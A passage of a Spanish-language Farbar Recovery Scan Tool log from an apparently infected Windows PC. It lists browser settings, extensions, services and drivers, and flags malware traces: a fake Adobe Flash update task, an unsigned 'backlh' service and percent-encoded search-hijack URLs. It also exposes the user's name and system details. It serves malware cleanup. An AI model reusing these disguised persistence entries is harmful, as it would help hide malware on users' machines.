Task: C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => C:\Users\MARCOA~1\AppData\Local\Temp\~atmp\_9D4F.exe/check_update C:\Users\MARCO AVILA\AppData\Local\inetinfoserviceMARCO AVILA6This task detecct has update for sdk files.up <==== ATENCIÓN

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137
Tcpip\..\Interfaces\{4CA491EE-4CD0-45CF-BC52-51C254C4A7B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{7AD1033E-FE1D-4D56-A9E9-134D6AEF16DB}: [DhcpNameServer] 10.0.196.141 200.77.146.137 200.52.170.150
Tcpip\..\Interfaces\{86463265-C657-4234-94AF-E401DE4093E0}: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkhHkUrzx4laegF9Lsrn6cGbBWaoxAyveZb_5f6wMIg7Y3I3uS7FKPtPsc4G5boKB1HV0Dzm1ClsgtcfQ-gepV-CvwsW
SearchScopes: HKLM -> DefaultScope no se encuentra el valor
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://mx.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10315__171019__yaie&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\PlusIEContextMenu.dll [2010-07-16] (Zeon Corporation -> Zeon Corporation)
BHO-x32: Aplicación auxiliar de inicio de sesión de Windows Live ID -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: IEInspector Browser Helper -> {9B43B7B1-BF56-4708-81D2-332D708B0DD9} -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\IEInspectorBHO.dll [2017-04-12] (QingHai -> IEInspector Software)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: ZeonIEEventHelper Class -> {DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Toolbar: HKLM-x32 - DocuCom PDF - {E3286BF1-E654-42FF-B4A6-5E111731DF6B} - C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler: WSISAllmytubechrome - Sin valor CLSID

FireFox:
========
FF DefaultProfile: ds5ojdhh.default-1492367854850
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\24bww9ll.default-release [2020-03-25]
FF Extension: (Free Download Manager extension) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2017-08-11] [Heredado]
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 [2020-03-26]
FF DownloadDir: C:\Users\MARCO AVILA\Desktop
FF Homepage: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://www.google.com.mx/
FF NewTab: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://espanol.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10315__171019__yaff
FF Notifications: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://crackingportal.com; hxxps://notifications.models.xxx; hxxps://www.interjet.com
FF Extension: (English United States Dictionary) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\@unitedstatesenglishdictionary.xpi [2020-02-02]
FF Extension: (ZenMate Free VPN - Mejor VPN) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-11]
FF Extension: (English (US) Language Pack) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-12]
FF Extension: (FlashGot) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2017-08-22] [Heredado]
FF Extension: (Bulk Media Downloader) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{72b2e02b-3a71-4895-886c-fd12ebe36ba3}.xpi [2017-12-09]
FF Extension: (ReminderFox) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ada4b710-8346-4b82-8199-5de2b400a6ae}.xpi [2017-06-26] [Heredado]
FF Extension: (Video DownloadHelper) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2019-07-07]
FF Extension: (HTTP Header Live) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ed102056-8b4f-43a9-99cd-6d1b25abe87e}.xpi [2019-08-20]
FF SearchPlugin: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\searchplugins\yahoo-lavasoft.xml [2017-10-19]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2020-01-21]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5 [2020-01-24] [Heredado] [no firmado]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Heredado]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll [2013-04-03] (Adobe Systems, Inc.) [Archivo no firmado]
FF Plugin-x32: @cambridgesoft.com/Chem3D,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\Chem3D\npChem3DPlugin.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @cambridgesoft.com/ChemDraw,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\ChemDraw\npcdp32.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @ieinspector.com/ha_plugin -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\firefox\Components [2018-12-06] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: ZEON/PDF,version=2.0 -> C:\Program Files (x86)\Nuance\PDF Professional 7\bin\nppdf.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)

Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default [2020-03-26]
CHR HomePage: Default -> hxxp://google.com.mx/
CHR StartupUrls: Default -> "hxxp://google.com.mx/"
CHR Extension: (Tampermonkey) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-11-14]
CHR Extension: (SingleFile Core) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\jemlklgaibiijojffihnhieihhagocma [2013-06-24]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2013-06-24]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-11-14]
CHR Extension: (Vine Client) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\oojohjpgmcfnholboljmkbcchbipcbci [2015-06-28]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-14]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-03-26]
CHR HomePage: Profile 1 -> hxxps://www.google.com.mx/
CHR StartupUrls: Profile 1 -> "hxxp://google.com.mx/"
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-16]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-30]
CHR Extension: (Twitter Media Downloader) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cblpjenafgeohmnjknfhpdbdljfkndig [2020-03-15]
CHR Extension: (DownAlbum) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cgjnhhjpfcdhbhlcmmjppicjmgfkppok [2020-03-04]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Twitter) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jgeocpdicgmkeemopbanhokmhcgcflmi [2019-08-29]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2020-03-17]
CHR Extension: (IDM Integration Module) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2020-02-05]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-09-30]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-03-26]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-19]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile [2020-03-26]
CHR Extension: (Presentaciones de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-28]
CHR Extension: (Google Docs) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-28]
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-28]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-28]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-28]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-28]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-28]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MARCOA~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [fhjnbgadgmmffddcilnbmcieekimilcn] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]
==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
S4 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [204880 2018-06-11] (CyberGhost SRL -> CyberGhost S.A.)
R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4667392 2020-03-26] () [Archivo no firmado]
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [786976 2009-10-02] (Acer Incorporated -> Acer Incorporated)
S4 ExpressVPNService; C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe [438664 2019-08-21] (Express Vpn LLC -> ExpressVPN)
S3 GSService; C:\Windows\SysWOW64\GSService.exe [444640 2014-07-28] (cyan soft ltd -> )
S4 Http_analyzer_v7_netfilter; C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\netFilterService.exe [447384 2017-04-12] (QingHai -> )
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [Archivo no firmado]
R2 IsaMonitor; C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe [185856 2008-07-23] (Fine Point Technologies, Inc.) [Archivo no firmado]
R2 [email protected]; C:\Windows\[email protected] [26112 2018-11-10] () [Archivo no firmado]
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5977200 2020-03-25] (Malwarebytes Inc -> Malwarebytes)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [6933272 2020-03-25] (Malwarebytes Inc -> Malwarebytes)
R2 msftesql$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe [95592 2007-06-22] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-24] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57966424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
S2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) [Archivo no firmado]
R2 ODDPwrSvc; C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe [158240 2009-09-04] (Acer Incorporated -> Acer Incorporated)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [253952 2009-07-09] (Acer Incorporated) [Archivo no firmado]
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [430424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
S2 SZASSIST; C:\Program Files (x86)\Clarus\Samsung SecretZone\SZAssistSVC.exe [90112 2010-07-30] (Clarus, Inc.) [Archivo no firmado]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-09-28] (Ulead Systems, Inc.) [Archivo no firmado]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292096 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Windows -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-04-20] (Bluestack Systems, Inc. -> BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-04-19] (Bluestack Systems, Inc. -> Bluestack System Inc. )
R3 debutfilter; C:\Windows\System32\DRIVERS\debutfilterx64.sys [34512 2015-11-15] (NCH Software -> )
S3 DrmRAudio; C:\Windows\System32\drivers\DrmRAudio.sys [36064 2014-07-28] (cyan soft ltd -> Windows (R) Win 7 DDK provider)
S3 expressvpnsplittunnel; C:\Program Files (x86)\ExpressVPN\splittunnel\expressvpnsplittunnel.sys [18800 2019-08-21] (ExprsVPN LLC -> )
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [54736 2017-04-15] (SurfRight B.V. -> )
R3 L1C; C:\Windows\System32\DRIVERS\L1C62x64.sys [58880 2009-07-27] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
